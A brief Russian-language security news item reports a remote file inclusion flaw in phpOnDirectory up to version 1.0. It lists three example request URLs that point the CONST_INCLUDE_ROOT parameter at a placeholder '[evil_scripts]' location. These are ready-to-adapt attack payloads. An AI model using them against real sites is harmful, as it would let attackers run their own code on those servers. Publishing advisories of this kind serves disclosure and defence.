Польскими хакерами были опубликованы уязвимости в phpOnDirectory <= v.1.0. Смысл уязвимости состоит в удаленном инклуде файла.
Примером может служить:
http://www.site.com/[phpOnDirectory_path]/admin/generate_category_html.php?CONST_INCLUDE_ROOT=[evil_scripts]
http://www.site.com/[phpOnDirectory_path]/admin/generate_site_html.php?CONST_INCLUDE_ROOT=[evil_scripts]
http://www.site.com/[phpOnDirectory_path]/admin/index.php?CONST_INCLUDE_ROOT=[evil_scripts]
SQL общее время: 0.011 секунд SQL запросов всего: 18
Администрация
сайта не несет
ответственности за
содержание рекламных
материалов, а так же за
информацию размещаемой
посетителями. При
использовании материалов
сайта ссылка на svdpro.info
обязательна.